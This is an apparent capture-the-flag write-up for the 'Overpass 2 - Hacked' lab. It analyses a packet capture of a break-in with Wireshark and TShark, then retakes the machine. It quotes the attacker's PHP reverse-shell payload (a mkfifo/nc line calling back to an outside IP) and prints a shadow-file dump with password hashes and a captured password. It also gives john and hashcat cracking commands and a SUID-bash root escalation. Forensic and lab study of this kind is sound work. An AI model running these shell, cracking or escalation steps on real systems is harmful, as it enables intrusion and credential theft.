🧑‍🔬 OVERPASS 2 - HACKED

1. Forensic analysis:

  • Open Wireshark and load the capture file (overpass2.pcapng).

  • Filter the packets by HTTP protocol.

  • Look for the path "/development/upload.php".

  • Analyse the payload of payload.php to see how the reverse shell command was executed.

  • We also filter the capture with TShark:

tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"
tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings

Payload of payload.php:

<?php
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f");
?>

2. Privilege escalation:

  • Search the Wireshark capture for the "sudo" command.

  • Note the password "siemprequenoteartinstant" used by the attacker to run the command with superuser privileges.

su james

3. Persistence:

4. Gaining access:

  • Crack 4 of the 5 user passwords the attacker saw in /etc/shadow, using John the Ripper and a wordlist.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt

  • Crack the SSH backdoor hash with hashcat. First we save the hash the attacker used when running the ssh backdoor, together with the salt contained in that script; the file stores it as hash:salt.

┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:1c362db832f3f864c8c2fe05f2002a05

  • Use ssh to connect to the system with the "James" account and the password "november16".

Command to crack the SSH backdoor hash:

hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt

5. Elevating privileges:

  • Run the ".suid_bash" file with the "-p" flag to obtain root privileges. We found this parameter among the options of the suid_bash binary: passing a bogus -j or -h printed the parameters it accepted, and -p was described as letting the SUID-root binary access every path in $PATH, so from there we could run any command as root, and that was it.

Command to obtain root privileges:

./.suid_bash -p

Result:

  • Control of the system is recovered and the user and root flags are obtained.


OFFENSIVE PENTESTING:

Overpass 2 - Hacked:

We download the .pcap file that captured the network during the attack we received, then verify the file's integrity with md5sum; it checks out:


┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# md5sum overpass2.pcapng 
11c3b2e9221865580295bc662c35c6dc  overpass2.pcapng

---------------------------   WIRESHARK     ------------------------------

Skimming the file we already see this information right away: a file upload was requested from the attacker IP 192.168.170.145 to our server, the victim IP 192.168.170.159, with a GET request to the path /development/uploads/payload.php:

PAYLOAD PACKET:

Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159

Transmission Control Protocol, Src Port: 47736, Dst Port: 80, Seq: 1, Ack: 1, Len: 400

Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

http://192.168.170.159/development/uploads/payload.php      


 
0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   01 c4 51 81 40 00 40 06 11 31 c0 a8 aa 91 c0 a8   ..Q.@.@..1......
0020   aa 9f ba 78 00 50 e0 79 05 4f c6 62 99 6d 80 18   ...x.P.y.O.b.m..
0030   01 f6 59 5e 00 00 01 01 08 0a c2 13 f6 dc 35 50   ..Y^..........5P
0040   7d 77 47 45 54 20 2f 64 65 76 65 6c 6f 70 6d 65   }wGET /developme
0050   6e 74 2f 75 70 6c 6f 61 64 73 2f 70 61 79 6c 6f   nt/uploads/paylo
0060   61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d   ad.php HTTP/1.1.
0070   0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31   .Host: 192.168.1
0080   37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65   70.159..User-Age
0090   6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20   nt: Mozilla/5.0 
00a0   28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f   (X11; Linux x86_
00b0   36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63   64; rv:68.0) Gec
00c0   6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65   ko/20100101 Fire
00d0   66 6f 78 2f 36 38 2e 30 0d 0a 41 63 63 65 70 74   fox/68.0..Accept
00e0   3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c   : text/html,appl
00f0   69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d   ication/xhtml+xm
0100   6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d   l,application/xm
0110   6c 3b 71 3d 30 2e 39 2c 2a 2f 2a 3b 71 3d 30 2e   l;q=0.9,*/*;q=0.
0120   38 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61   8..Accept-Langua
0130   67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30   ge: en-US,en;q=0
0140   2e 35 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64   .5..Accept-Encod
0150   69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61   ing: gzip, defla
0160   74 65 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74   te..Referer: htt
0170   70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 37 30 2e   p://192.168.170.
0180   31 35 39 2f 64 65 76 65 6c 6f 70 6d 65 6e 74 2f   159/development/
0190   75 70 6c 6f 61 64 73 2f 0d 0a 43 6f 6e 6e 65 63   uploads/..Connec
01a0   74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65   tion: keep-alive
01b0   0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75   ..Upgrade-Insecu
01c0   72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a   re-Requests: 1..
01d0   0d 0a                                             ..

Reverse shell transmission packet: we see that the attacker requested, and we sent back, the cat of /etc/passwd. We also detect that their reverse shell is listening on port 4242 of the attacker IP, and the responses leave from our port 57680:

Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145

Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 1543, Ack: 171, Len: 1462


0000   00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00   ..)..H..)n....E.
0010   05 ea ae bd 40 00 40 06 af ce c0 a8 aa 9f c0 a8   ....@.@.........
0020   aa 91 e1 50 10 92 09 61 b5 64 67 a7 d5 31 80 18   ...P...a.dg..1..
0030   01 f6 dc 5e 00 00 01 01 08 0a 35 51 84 97 c2 14   ...^......5Q....
0040   fd f8 72 6f 6f 74 3a 2a 3a 31 38 32 39 35 3a 30   ..root:*:18295:0
0050   3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 64 61 65   :99999:7:::..dae
0060   6d 6f 6e 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39   mon:*:18295:0:99
0070   39 39 39 3a 37 3a 3a 3a 0d 0a 62 69 6e 3a 2a 3a   999:7:::..bin:*:
0080   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
0090   3a 3a 0d 0a 73 79 73 3a 2a 3a 31 38 32 39 35 3a   ::..sys:*:18295:
00a0   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79   0:99999:7:::..sy
00b0   6e 63 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   nc:*:18295:0:999
00c0   39 39 3a 37 3a 3a 3a 0d 0a 67 61 6d 65 73 3a 2a   99:7:::..games:*
00d0   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
00e0   3a 3a 3a 0d 0a 6d 61 6e 3a 2a 3a 31 38 32 39 35   :::..man:*:18295
00f0   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 6c   :0:99999:7:::..l
0100   70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   p:*:18295:0:9999
0110   39 3a 37 3a 3a 3a 0d 0a 6d 61 69 6c 3a 2a 3a 31   9:7:::..mail:*:1
0120   38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a   8295:0:99999:7::
0130   3a 0d 0a 6e 65 77 73 3a 2a 3a 31 38 32 39 35 3a   :..news:*:18295:
0140   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75   0:99999:7:::..uu
0150   63 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   cp:*:18295:0:999
0160   39 39 3a 37 3a 3a 3a 0d 0a 70 72 6f 78 79 3a 2a   99:7:::..proxy:*
0170   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
0180   3a 3a 3a 0d 0a 77 77 77 2d 64 61 74 61 3a 2a 3a   :::..www-data:*:
0190   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
01a0   3a 3a 0d 0a 62 61 63 6b 75 70 3a 2a 3a 31 38 32   ::..backup:*:182
01b0   39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d   95:0:99999:7:::.
01c0   0a 6c 69 73 74 3a 2a 3a 31 38 32 39 35 3a 30 3a   .list:*:18295:0:
01d0   39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 69 72 63 3a   99999:7:::..irc:
01e0   2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a   *:18295:0:99999:
01f0   37 3a 3a 3a 0d 0a 67 6e 61 74 73 3a 2a 3a 31 38   7:::..gnats:*:18
0200   32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a   295:0:99999:7:::
0210   0d 0a 6e 6f 62 6f 64 79 3a 2a 3a 31 38 32 39 35   ..nobody:*:18295
0220   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73   :0:99999:7:::..s
0230   79 73 74 65 6d 64 2d 6e 65 74 77 6f 72 6b 3a 2a   ystemd-network:*
0240   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
0250   3a 3a 3a 0d 0a 73 79 73 74 65 6d 64 2d 72 65 73   :::..systemd-res
0260   6f 6c 76 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39   olve:*:18295:0:9
0270   39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 73 6c 6f   9999:7:::..syslo
0280   67 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   g:*:18295:0:9999
0290   39 3a 37 3a 3a 3a 0d 0a 6d 65 73 73 61 67 65 62   9:7:::..messageb
02a0   75 73 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   us:*:18295:0:999
02b0   39 39 3a 37 3a 3a 3a 0d 0a 5f 61 70 74 3a 2a 3a   99:7:::.._apt:*:
02c0   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
02d0   3a 3a 0d 0a 6c 78 64 3a 2a 3a 31 38 32 39 35 3a   ::..lxd:*:18295:
02e0   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75   0:99999:7:::..uu
02f0   69 64 64 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39   idd:*:18295:0:99
0300   39 39 39 3a 37 3a 3a 3a 0d 0a 64 6e 73 6d 61 73   999:7:::..dnsmas
0310   71 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   q:*:18295:0:9999
0320   39 3a 37 3a 3a 3a 0d 0a 6c 61 6e 64 73 63 61 70   9:7:::..landscap
0330   65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   e:*:18295:0:9999
0340   39 3a 37 3a 3a 3a 0d 0a 70 6f 6c 6c 69 6e 61 74   9:7:::..pollinat
0350   65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   e:*:18295:0:9999
0360   39 3a 37 3a 3a 3a 0d 0a 73 73 68 64 3a 2a 3a 31   9:7:::..sshd:*:1
0370   38 34 36 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a   8464:0:99999:7::
0380   3a 0d 0a 6a 61 6d 65 73 3a 24 36 24 37 47 53 35   :..james:$6$7GS5
0390   65 2e 79 76 24 48 71 49 48 35 4d 74 68 70 47 57   e.yv$HqIH5MthpGW
03a0   70 63 7a 72 33 4d 6e 77 44 48 6c 45 44 38 67 62   pczr3MnwDHlED8gb
03b0   56 53 48 74 37 6d 61 38 79 78 7a 42 4d 38 4c 75   VSHt7ma8yxzBM8Lu
03c0   42 52 65 44 56 35 65 31 50 75 2f 56 75 52 73 6b   BReDV5e1Pu/VuRsk
03d0   75 67 74 31 43 6b 75 6c 2f 53 4b 47 58 2e 35 50   ugt1Ckul/SKGX.5P
03e0   79 4d 70 7a 41 59 6f 33 43 67 2f 3a 31 38 34 36   yMpzAYo3Cg/:1846
03f0   34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a   4:0:99999:7:::..
0400   70 61 72 61 64 6f 78 3a 24 36 24 6f 52 58 51 75   paradox:$6$oRXQu
0410   34 33 58 24 57 61 41 6a 33 5a 2f 34 73 45 50 56   43X$WaAj3Z/4sEPV
0420   31 6d 4a 64 48 73 79 4a 6b 49 5a 6d 31 72 6a 6a   1mJdHsyJkIZm1rjj
0430   6e 4e 78 72 59 35 63 38 47 45 6c 4a 49 6a 47 37   nNxrY5c8GElJIjG7
0440   75 33 36 78 53 67 4d 47 77 4b 41 32 77 6f 44 49   u36xSgMGwKA2woDI
0450   46 75 64 74 79 71 59 33 37 59 43 79 75 6b 69 48   FudtyqY37YCyukiH
0460   4a 50 68 69 34 49 55 37 48 30 3a 31 38 34 36 34   JPhi4IU7H0:18464
0470   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73   :0:99999:7:::..s
0480   7a 79 6d 65 78 3a 24 36 24 42 2e 45 6e 75 58 69   zymex:$6$B.EnuXi
0490   4f 24 66 2f 75 30 30 48 6f 73 5a 49 4f 33 55 51   O$f/u00HosZIO3UQ
04a0   43 45 4a 70 6c 61 7a 6f 51 74 48 38 57 4a 6a 53   CEJplazoQtH8WJjS
04b0   58 2f 6f 6f 42 6a 77 6d 59 66 45 4f 54 63 71 43   X/ooBjwmYfEOTcqC
04c0   41 6c 4d 6a 65 46 49 67 59 57 71 52 35 41 6a 32   AlMjeFIgYWqR5Aj2
04d0   76 73 66 52 79 66 36 78 31 77 58 78 4b 69 74 63   vsfRyf6x1wXxKitc
04e0   50 55 6a 63 58 6c 58 2f 3a 31 38 34 36 34 3a 30   PUjcXlX/:18464:0
04f0   3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 62 65 65   :99999:7:::..bee
0500   3a 24 36 24 2e 53 71 48 72 70 36 7a 24 42 34 72   :$6$.SqHrp6z$B4r
0510   57 50 69 30 48 6b 6a 30 67 62 51 4d 46 75 6a 7a   WPi0Hkj0gbQMFujz
0520   31 4b 48 56 73 39 56 72 53 46 75 37 41 55 39 43   1KHVs9VrSFu7AU9C
0530   78 57 72 5a 56 37 47 7a 48 30 35 74 59 50 4c 31   xWrZV7GzH05tYPL1
0540   78 52 7a 55 4a 6c 46 48 62 79 70 30 4b 39 54 41   xRzUJlFHbyp0K9TA
0550   65 59 31 4d 36 6e 69 46 73 65 42 39 56 4c 42 57   eY1M6niFseB9VLBW
0560   53 6f 30 3a 31 38 34 36 34 3a 30 3a 39 39 39 39   So0:18464:0:9999
0570   39 3a 37 3a 3a 3a 0d 0a 6d 75 69 72 6c 61 6e 64   9:7:::..muirland
0580   3a 24 36 24 53 57 79 62 53 38 6f 32 24 39 64 69   :$6$SWybS8o2$9di
0590   76 65 51 69 6e 78 79 38 50 4a 51 6e 47 51 51 57   veQinxy8PJQnGQQW
05a0   62 54 4e 4b 65 62 32 41 69 53 70 2e 69 38 4b 7a   bTNKeb2AiSp.i8Kz
05b0   6e 75 41 6a 59 62 71 49 33 71 30 34 52 66 35 68   nuAjYbqI3q04Rf5h
05c0   6a 48 50 65 72 33 77 65 69 43 2e 32 4d 72 4f 6a   jHPer3weiC.2MrOj
05d0   32 6f 31 53 77 2f 66 64 32 63 75 30 6b 43 36 64   2o1Sw/fd2cu0kC6d
05e0   55 50 2e 3a 31 38 34 36 34 3a 30 3a 39 39 39 39   UP.:18464:0:9999
05f0   39 3a 37 3a 3a 3a 0d 0a                           9:7:::..

We also see the terminal prompt of the session the attacker's reverse shell opened on our server, showing the user they took control of, james, on the Overpass company machine:

Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145

Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 3005, Ack: 171, Len: 29
0000   00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00   ..)..H..)n....E.
0010   00 51 ae bf 40 00 40 06 b5 65 c0 a8 aa 9f c0 a8   .Q..@.@..e......
0020   aa 91 e1 50 10 92 09 61 bb 1a 67 a7 d5 31 80 18   ...P...a..g..1..
0030   01 f6 4f 91 00 00 01 01 08 0a 35 51 84 97 c2 14   ..O.......5Q....
0040   fd fc 6a 61 6d 65 73 40 6f 76 65 72 70 61 73 73   ..james@overpass
0050   2d 70 72 6f 64 75 63 74 69 6f 6e 3a 7e 24 20      -production:~$ 

We also see that the attacker had our victim machine clone an SSH backdoor repository from GitHub (git clone https://github.com/NinjaJc01/ssh-backdoor):

Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159

Transmission Control Protocol, Src Port: 4242, Dst Port: 57680, Seq: 171, Ack: 3034, Len: 52
0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   00 68 77 75 40 00 40 06 ec 98 c0 a8 aa 91 c0 a8   .hwu@.@.........
0020   aa 9f 10 92 e1 50 67 a7 d5 31 09 61 bb 37 80 18   .....Pg..1.a.7..
0030   01 f5 2a 8b 00 00 01 01 08 0a c2 15 86 21 35 51   ..*..........!5Q
0040   84 97 67 69 74 20 63 6c 6f 6e 65 20 68 74 74 70   ..git clone http
0050   73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4e   s://github.com/N
0060   69 6e 6a 61 4a 63 30 31 2f 73 73 68 2d 62 61 63   injaJc01/ssh-bac
0070   6b 64 6f 6f 72 0a                                 kdoor.

------------------------------  TSHARK  -----------------------------

Well, in broad strokes we have already seen the information, but we need to analyse it more comfortably and quickly, and I think we will do that with tshark, filtering with a pipeline and grep:

We read the raw file:

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng                  
Running as user "root" and group "root". This could be dangerous.
    1 0.000000000 192.168.170.145 → 192.168.170.159 TCP 74 47732 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256059711 TSecr=0 WS=128
    2 0.000122542 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47732 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894438874 TSecr=3256059711 WS=128
    3 0.000211854 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256059711 TSecr=894438874
    4 0.000326676 192.168.170.145 → 192.168.170.159 HTTP 484 GET /development/ HTTP/1.1 
    5 0.000342046 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [ACK] Seq=1 Ack=419 Win=64768 Len=0 TSval=894438874 TSecr=3256059711
    6 0.000860947 192.168.170.159 → 192.168.170.145 HTTP 1078 HTTP/1.1 200 OK  (text/html)
    7 0.000863357 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256059712 TSecr=894438875
    8 5.002042815 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [FIN, ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256064713 TSecr=894438875
    9 5.002197308 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [FIN, ACK] Seq=1013 Ack=420 Win=64768 Len=0 TSval=894443876 TSecr=3256064713
   10 5.002289760 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=420 Ack=1014 Win=64128 Len=0 TSval=3256064713 TSecr=894443876
   11 7.915625379 192.168.170.145 → 192.168.170.159 TCP 74 47734 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256067626 TSecr=0 WS=128
   12 7.915783662 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47734 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894446790 TSecr=3256067626 WS=128
   13 7.915903135 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256067627 TSecr=894446790
   14 7.915992166 192.168.170.145 → 192.168.170.159 HTTP 1026 POST /development/upload.php HTTP/1.1  (application/x-php)
   15 7.916108038 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [ACK] Seq=1 Ack=961 Win=64256 Len=0 TSval=894446790 TSecr=3256067627
   16 7.916964256 192.168.170.159 → 192.168.170.145 HTTP 309 HTTP/1.1 200 OK  (text/html)
   17 7.916975776 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=961 Ack=244 Win=64128 Len=0 TSval=3256067628 TSecr=894446791
   18 11.984825193 192.168.170.145 → 192.168.170.159 HTTP 401 GET /development/uploads/ HTTP/1.1 
   19 11.985407246 192.168.170.159 → 192.168.170.145 HTTP 788 HTTP/1.1 200 OK  (text/html)
   20 11.985492397 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256071696 TSecr=894450859
   21 16.986459371 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [FIN, ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256076697 TSecr=894450859
   22 16.986574454 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [FIN, ACK] Seq=966 Ack=1297 Win=64128 Len=0 TSval=894455860 TSecr=3256076697
   23 16.986655155 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1297 Ack=967 Win=64128 Len=0 TSval=3256076697 TSecr=894455860
   24 28.573920433 192.168.170.145 → 192.168.170.159 TCP 74 47736 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256088284 TSecr=0 WS=128
   25 28.574038675 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47736 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894467447 TSecr=3256088284 WS=128
   26 28.574114977 192.168.170.145 → 192.168.170.159 TCP 66 47736 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256088284 TSecr=894467447
   27 28.574178738 192.168.170.145 → 192.168.170.159 HTTP 466 GET /development/uploads/payload.php HTTP/1.1 
   28 28.574306231 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894467448 TSecr=3256088284
   29 28.577587788 192.168.170.159 → 192.168.170.145 TCP 74 57680 → 4242 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=894467451 TSecr=0 WS=128
   30 28.577592188 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=3256088288 TSecr=894467451 WS=128
   31 28.577678110 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=894467451 TSecr=3256088288
   32 28.577728691 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=1 Ack=1 Win=64256 Len=55 TSval=894467451 TSecr=3256088288
   33 28.577735721 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=1 Ack=56 Win=65152 Len=0 TSval=3256088288 TSecr=894467451
   34 38.757749641 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256098468 TSecr=894467448
   35 38.757894444 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894477631 TSecr=3256088284
   36 39.323816051 192.168.170.145 → 192.168.170.159 TCP 69 4242 → 57680 [PSH, ACK] Seq=1 Ack=56 Win=65152 Len=3 TSval=3256099034 TSecr=894467451
   37 39.323916393 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=56 Ack=4 Win=64256 Len=0 TSval=894478197 TSecr=3256099034
   38 39.325002015 192.168.170.159 → 192.168.170.145 TCP 120 57680 → 4242 [PSH, ACK] Seq=56 Ack=4 Win=64256 Len=54 TSval=894478198 TSecr=3256099034
   39 39.325065907 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=110 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
   40 39.325194169 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=110 Ack=4 Win=64256 Len=2 TSval=894478198 TSecr=3256099035
   41 39.325239331 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=112 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
   42 40.710537987 192.168.170.138 → 192.168.170.254 DHCP 338 DHCP Request  - Transaction ID 0xdf5ef3a7
   43 40.710799752 192.168.170.254 → 192.168.170.138 DHCP 342 DHCP ACK      - Transaction ID 0xdf5ef3a7
   44 44.659136740 192.168.170.145 → 192.168.170.159 TCP 113 4242 → 57680 [PSH, ACK] Seq=4 Ack=112 Win=65152 Len=47 TSval=3256104369 TSecr=894478198
   45 44.677577863 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=112 Ack=51 Win=64256 Len=64 TSval=894483551 TSecr=3256104369
   46 44.677585633 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=51 Ack=176 Win=65152 Len=0 TSval=3256104388 TSecr=894483551
   47 45.883299798 VMware_82:6c:a5 → VMware_e5:1f:cc ARP 42 Who has 192.168.170.254? Tell 192.168.170.138
   48 45.883412361 VMware_e5:1f:cc → VMware_82:6c:a5 ARP 60 192.168.170.254 is at 00:50:56:e5:1f:cc
   49 48.593184369 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=51 Ack=176 Win=65152 Len=8 TSval=3256108303 TSecr=894483551
   50 48.593672339 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=176 Ack=59 Win=64256 Len=9 TSval=894487467 TSecr=3256108303
   51 48.593744170 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=185 Win=65152 Len=0 TSval=3256108304 TSecr=894487467
   52 48.594671419 192.168.170.159 → 192.168.170.145 TCP 78 57680 → 4242 [PSH, ACK] Seq=185 Ack=59 Win=64256 Len=12 TSval=894487468 TSecr=3256108304
   53 48.594685199 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=197 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
   54 48.594748890 192.168.170.159 → 192.168.170.145 TCP 184 57680 → 4242 [PSH, ACK] Seq=197 Ack=59 Win=64256 Len=118 TSval=894487468 TSecr=3256108305
   55 48.594807082 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=315 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
   56 48.595037346 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=315 Ack=59 Win=64256 Len=64 TSval=894487468 TSecr=3256108305
   57 48.595043106 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=379 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
   58 48.997256109 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256108707 TSecr=894477631
   59 48.997335350 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894487870 TSecr=3256088284
   60 52.615293905 192.168.170.145 → 192.168.170.159 TCP 80 4242 → 57680 [PSH, ACK] Seq=59 Ack=379 Win=65152 Len=14 TSval=3256112325 TSecr=894487468
   61 52.615822285 192.168.170.159 → 192.168.170.145 TCP 81 57680 → 4242 [PSH, ACK] Seq=379 Ack=73 Win=64256 Len=15 TSval=894491489 TSecr=3256112325
   62 52.615888056 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=394 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   63 52.616362367 192.168.170.159 → 192.168.170.145 TCP 117 57680 → 4242 [PSH, ACK] Seq=394 Ack=73 Win=64256 Len=51 TSval=894491489 TSecr=3256112326
   64 52.616371067 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=445 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   65 52.616574160 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=445 Ack=73 Win=64256 Len=64 TSval=894491489 TSecr=3256112326
